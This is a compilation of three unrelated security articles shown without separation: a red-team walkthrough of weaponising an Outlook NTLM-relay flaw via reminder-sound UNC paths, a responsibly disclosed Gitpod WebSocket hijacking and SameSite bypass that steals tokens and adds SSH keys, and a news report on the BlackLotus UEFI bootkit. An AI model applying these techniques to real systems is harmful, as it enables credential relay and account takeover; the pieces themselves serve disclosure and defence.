Today saw Microsoft patch an interesting vulnerability in Microsoft Outlook. The vulnerability is described as follows:
Microsoft Office Outlook contains a privilege escalation vulnerability that allows for a NTLM Relay attack against another service to authenticate as the user.
However, no specific details were provided on how to exploit the vulnerability.
At MDSec, we’re continually looking to weaponise both private and public vulnerabilities to assist us during our red team operations. Having recently given a talk on leveraging NTLM relaying during red team engagements at FiestaCon, this vulnerability particularly stood out to me and warranted further analysis.
While no particular details were provided, Microsoft did provide a script to audit your Exchange server for mail items that might be being used to exploit the issue.
Review of the audit script reveals it is specifically looking for the PidLidReminderFileParameterproperty inside the mail items and offers the option to “clean” it if found:
Diving in to what this property is, we find the following definition:
This property controls what filename should be played by the Outlook client when the reminder for the mail item is triggered. This is of course particularly interesting as it implies that the property accepts a filename, which of could potentially be a UNC path in order to trigger the NTLM authentication.
Following further analysis of the available properties, we also note the PidLidReminderOverride property which is described as follows:
With this in mind, we should likely set the PidLidReminderOverride property in order to trigger Outlook to parse our malicious UNC inside PidLidReminderFileParameter.
Let’s begin to build an exploit….
The first step to exploit this issue is to create an Outlook MSG file; these files are compound files in CFB format. To speed up the generation of these files, I leveraged the .NET MsgKit library.
Reviewing the MsgKit library, we find that the Appointment class defines a number of properties to add to the mail item before the MSG file is saved:
To create our malicious calendar appointment, I extended the Appointment class to add our required PidLidReminderOverride and PidLidReminderFileParameter properties, as shown above.
From that point, we simply need to create a new appointment and save it, before sending to our victim:
This vulnerability is particularly interesting as it will trigger NTLM authentication to an IP address (i.e. a system outside of the Trusted Intranet Zone or Trusted Sites) and this occurs immediately on opening the e-mail, irrespective of whether the user has selected the option to load remote images or not.
This one is worth patching as a priority as its incredibly easy to exploit and will no doubt be adopted by adversaries fast.
Here’s a demonstration of our exploit which will relay the incoming request to LDAP to obtain a shadow credential:
This article walks us through a current Snyk Security Labs research project focusing on cloud based development environments (CDEs) — which resulted in a full workspace takeover on the Gitpod platform and extended to the user’s SCM account. The issues here have been responsibly disclosed to Gitpod and were resolved within a single working day!
Cloud development environments and Gitpod
As more and more companies begin to leverage cloud-based development environments for benefits such as improved performance, developer experience, consistent development environments, and low setup times, we couldn’t help but wonder about the security implications of adopting these cloud based IDEs.
First, let’s provide a brief overview of how CDEs operate so we can understand the difference between cloud-based and traditional, local-workstation based development — and how it changes the developer security landscape.
In contrast to traditional development, CDEs run on a cloud hosted machine with an IDE backend. This typically provides a web application version of the IDE and support for integrating with a locally installed IDE over SSH, giving users a seamless and familiar experience. When using a CDE, the organization’s code and any supporting services, such as a development database, are hosted within the cloud. Check out the following diagram for a visual representation of information flow in a CDE.
The security risks of locally installed development environments are not new. However, they historically haven’t received much attention from developers. In May 2021, Snyk disclosed vulnerable VS Code extensions that lead to a 1-click data leak or arbitrary command execution. These traditional workstation-based development environments, such as a local instance of VS Code or IntelliJ, carry other information security concerns — including hardware failure, data security, and malware. While these concerns can be addressed by employing Full Disk Encryption, version control, backups, and anti-malware systems, many questions remain unanswered with the adoption of cloud-based development environments:
What happens if a cloud IDE workspace is infected with malware?
What happens when access controls are insufficient and allow cross-user or even cross-organization access to workspaces?
What happens when a rogue developer exfiltrates company intellectual property from a cloud-hosted machine outside the visibility of the organization’s data loss prevention or endpoint security software?
In a current security research project here at Snyk, we examine the security implications of adopting cloud based IDEs. In this article we present a case study of one of the vulnerabilities discovered during our initial exploration in the Gitpod platform.
Examining the Gitpod platform
Disclaimer: When it came to looking at cloud IDE solutions for our research, we settled on either self-hosted or cloud-based solutions, where the vendor has a clearly defined security policy providing safe harbor for researchers.
One of the most popular CDE’s is Gitpod. Its wide adoption and extended feature set — including automated backups, Git integration out of the box, and multiple IDE backends — ensured that Gitpod was among the first products we looked into.
The first stage of our research involved becoming familiar with the basic workflows of Gitpod, setting up an organization, and experimenting with the product while capturing traffic using Burpsuite to observe the various APIs and transactions. We then pulled the Gitpod source code from GitHub to study the inner workings of its APIs, and reviewed any relevant architecture documentation to better understand each of the components and their function. A great resource for this was a video that provided an initial deep dive into the architecture of Gitpod. At a high level, Gitpod leverages multiple microservices deployed in a Kubernetes environment, where each user workspace is deployed to a dedicated ephemeral pod.
Gitpod’s primary set of external components are concerned with the dashboard, authentication, and the creation and management of workspaces, organizations, and accounts. At its core, the main component here is aptly named server, a TypeScript application that exposes a JSONRPC API over WebSocket that is consumed by a React frontend called dashboard.
From the dashboard, it’s easy to integrate with a SCM provider, such as GitHub or Bitbucket, to import a repository and spin up a development environment — which then serves the source code and provides a working Git environment. Once the workspace is provisioned, it is made accessible via
SSH
and
HTTPS
on a subdomain of gitpod.io (i.e
https://[WORKSPACE_NAME].[CLUSTER_NAME].gitpod.io
) through a Golang-based component called ws-proxy.
The security vulnerability that was discovered through our research relates primarily to the server component and the JSONRPC served over a WebSocket connection, which ultimately led to a workspace takeover in Gitpod.
Technical details
WebSockets and Same Origin Policy
WebSocket is a technology that allows for real-time, two-way communication between a client (typically a web browser) and a server. It enables a persistent connection between the client and server, allowing for continuous “real-time” data transfer without the need for repeated HTTP requests.
An interesting aspect of WebSockets from a security perspective, is that a browser security mechanism, the Same Origin Policy (SOP), does not apply. This is the security control which prevents a website from issuing an AJAX request to another website and being able to read the response. If this were possible, it would present a security concern because browsers typically submit cookies along with every request (even for Cross Origin requests, such as CSRF related attacks). Without SOP, any website would be able to issue requests to foreign websites and obtain your data from other domains.
This leads us to the vulnerability class known as Cross-Site WebSocket Hijacking. This attack is similar to a combination of a Cross-Site Request Forgery and CORS misconfiguration. When a WebSocket handshake relies solely upon HTTP cookies for authentication, a malicious website is able to instantiate a new WebSocket connection to the vulnerable application, allowing an attacker to both send and receive data through the connection.
When reviewing an application with WebSocket connections, it’s always worth examining this in depth. Let’s take a look at the WebSocket request for the Gitpod server.
In normal circumstances, the connection is successfully upgraded to a WebSocket and communication begins. There was no additional authentication taking place within the WebSocket exchange itself, and the JSONRPC can be invoked via the WebSocket connection.
So far, we’ve found no additional authentication taking place within the established channel — a good sign for any potential attackers. Now, let’s verify that no additional Origin checks are taking place by taking a handshake we have observed and tampering with the Origin header.
This looks promising! It seems that the domain
evil.com
is able to issue Cross-Origin WebSocket requests to
gitpod.io
. However, another security mechanism introduces a challenge.
SameSite Cookie bypass
SameSite cookies are a fairly recent addition, providing partial mitigation against Cross-Site Request Forgery (CSRF) attacks. While not everyone has adopted them, most popular browsers have made the default value for all cookies which do not explicitly disable
SameSite
to be
Lax
. So while the underlying vulnerability is present, without a bypass for
SameSite
cookies our attack would largely be theoretical and only work against a subset of outdated and niche browsers.
So what is a
site
in the context of
SameSite
? Simply put, the site corresponds to the combination of the scheme and the registrable domain (if any) of the origin’s host. If we look at the specifications for
SameSite
we can see that subdomains are not considered. This is more relaxed than the specification of an Origin used by the Same Origin Policy, which is comprised of a scheme + host (including subdomains) + port (eg: https://security.snyk.io:8443).
Earlier, we observed that the workspace was exposed via a subdomain on
gitpod.io
. In the context of
SameSite
, the workspace URL is considered to be the same site as
gitpod.io
. So, it should be possible for one workspace to issue a cross-domain
SameSite
request to a
*.gitpod.io
domain with the original user’s cookies attached. Let’s see if we can leverage an attacker controlled workspace to serve a WebSocket Hijacking payload.
To first verify that the cookies are indeed transmitted and the WebSocket communication is successfully achieved, let’s open the browser console from a workspace and attempt to initiate a WebSocket connection.
As we can see in the above screenshot, we attempt to open a new WebSocket connection and, once open, submit a JSONRPC request. We can see in the console output that a message has been received containing the result of our request, confirming that the cookies are submitted and the origin is permitted to open a websocket to
gitpod.io
.
We now need a way to serve JavaScript from the workspace that can be accessed by a Gitpod user. When looking through the features available, it is possible to expose ports in the workspace and make them accessible using a command line utility called
gitpod-cli
— available on the path inside the workspace by typing
gp
. We can invoke
gp ports expose 8080
, and then set up a basic Python web server using
python -m http.server 8080
. This in turn creates a new subdomain where the exposed port can be accessed as shown below.
However, the connection failed. This is somewhat concerning and requires more investigation. Here we open the source code and start looking for what could be causing the problem. We found the following regular expression pattern, which appears to be used to extract the workspace name from the URL.
The way this matching is performed results in the wrong workspace name being extracted, as demonstrated in the following screenshot:
So, it looks like we can’t serve our content from an exposed port inside the Gitpod hosted workspace and we need another way. By now we already know that we have privileged access to a machine that’s running the VS Code service and is serving requests issued to our workspace URL — so can we abuse this in some way?
The initial idea was to terminate the
vscode
process and start a Python web server to serve an HTML file. Unfortunately, this did not work and resulted in the workspace being restarted. This appeared to be performed by a local service
supervisor
. While testing this approach we noticed that when we terminated the process without binding another process to the VS Code port, the
supervisor
service will automatically restart the
vscode
process, resulting in a brief hang to the UI without a full restart of the workspace.
This brought a promising idea. Can we patch VS Code to serve a built-in exploit for us?
Patching VS Code was relatively easy. By comparing the original VS Code server source code to the distributed version, we quickly found a convenient location to serve the exploit.
VS Code contains an API endpoint at
/version
, which returns the commit of the current version:
We modified it so that the correct
Content-Type
of
text/html
and the contents of an HTML file were returned. Now, we terminated the
vscode
process, allowing our newly introduced changes to load into a newly spawned VS Code process instance:
Finally, we can leverage the JSONRPC methods
getLoggedInUser
,
getGitpodTokens
,
getOwnerToken
, and
addSSHPublicKey
to build a payload that grants us full control over the user’s workspaces when an unsuspecting Gitpod user visits our link!
Here it is in action:
We can see that we’ve been able to extract some sensitive information about the user account, and are notified that our SSH key has been added to the account. Let’s see if we can SSH to the workspace:
Mission successful! As shown above, we have full access to the user’s workspaces after they’ve visited a link we sent them!
Timeline
Mon, Feb. 13, 2023 — Vulnerability disclosed to vendor
In this post, we presented the first findings from our current research into Cloud Development Environments (CDEs) — which allowed a full account takeover through visiting a link, exploiting a commonly misunderstood vulnerability (WebSocket Hijacking), and leveraging a practical SameSite cookie bypass. As cloud developer workspaces are becoming increasingly popular, it’s important to consider the additional risks that are introduced.
We would like to praise Gitpod for their fantastic turnaround on addressing this security vulnerability, and look forward to presenting more of our findings on cloud-based remote development solutions in the near future.
A stealthy Unified Extensible Firmware Interface (UEFI) bootkit called BlackLotus has become the first publicly known malware capable of bypassing Secure Boot defenses, making it a potent threat in the cyber landscape.
«This bootkit can run even on fully up-to-date Windows 11 systems with UEFI Secure Boot enabled,» Slovak cybersecurity company ESET said in a report shared with The Hacker News.
UEFI bootkits are deployed in the system firmware and allow full control over the operating system (OS) boot process, thereby making it possible to disable OS-level security mechanisms and deploy arbitrary payloads during startup with high privileges.
Offered for sale at $5,000 (and $200 per new subsequent version), the powerful and persistent toolkit is programmed in Assembly and C and is 80 kilobytes in size. It also features geofencing capabilities to avoid infecting computers in Armenia, Belarus, Kazakhstan, Moldova, Romania, Russia, and Ukraine.
Details about BlackLotus first emerged in October 2022, with Kaspersky security researcher Sergey Lozhkin describing it as a sophisticated crimeware solution.
«This represents a bit of a ‘leap’ forward, in terms of ease of use, scalability, accessibility, and most importantly, the potential for much more impact in the forms of persistence, evasion, and/or destruction,» Eclypsium’s Scott Scheferman noted.
BlackLotus, in a nutshell, exploits a security flaw tracked as CVE-2022-21894 (aka Baton Drop) to get around UEFI Secure Boot protections and set up persistence. The vulnerability was addressed by Microsoft as part of its January 2022 Patch Tuesday update.
A successful exploitation of the vulnerability, according to ESET, allows arbitrary code execution during early boot phases, permitting a threat actor to carry out malicious actions on a system with UEFI Secure Boot enabled without having physical access to it.
«This is the first publicly known, in-the-wild abuse of this vulnerability,» ESET researcher Martin Smolár said. «Its exploitation is still possible as the affected, validly signed binaries have still not been added to the UEFI revocation list.»
«BlackLotus takes advantage of this, bringing its own copies of legitimate – but vulnerable – binaries to the system in order to exploit the vulnerability,» effectively paving the way for Bring Your Own Vulnerable Driver (BYOVD) attacks.
Besides being equipped to turn off security mechanisms like BitLocker, Hypervisor-protected Code Integrity (HVCI), and Windows Defender, it’s also engineered to drop a kernel driver and an HTTP downloader that communicates with a command-and-control (C2) server to retrieve additional user-mode or kernel-mode malware.
The exact modus operandi used to deploy the bootkit is unknown as yet, but it starts with an installer component that’s responsible for writing the files to the EFI system partition, disabling HVCI and BitLocker, and then rebooting the host.
The restart is followed by the weaponization of CVE-2022-21894 to achieve persistence and install the bootkit, after which it is automatically executed on every system start to deploy the kernel driver.
While the driver is tasked with launching the user-mode HTTP downloader and running next-stage kernel-mode payloads, the latter is capable of executing commands received from the C2 server over HTTPS.
This includes downloading and executing a kernel driver, DLL, or a regular executable; fetching bootkit updates, and even uninstalling the bootkit from the infected system.
«Many critical vulnerabilities affecting security of UEFI systems have been discovered in the last few years,» Smolár said. «Unfortunately, due the complexity of the whole UEFI ecosystem and related supply-chain problems, many of these vulnerabilities have left many systems vulnerable even a long time after the vulnerabilities have been fixed – or at least after we were told they were fixed.»
«It was just a matter of time before someone would take advantage of these failures and create a UEFI bootkit capable of operating on systems with UEFI Secure Boot enabled.»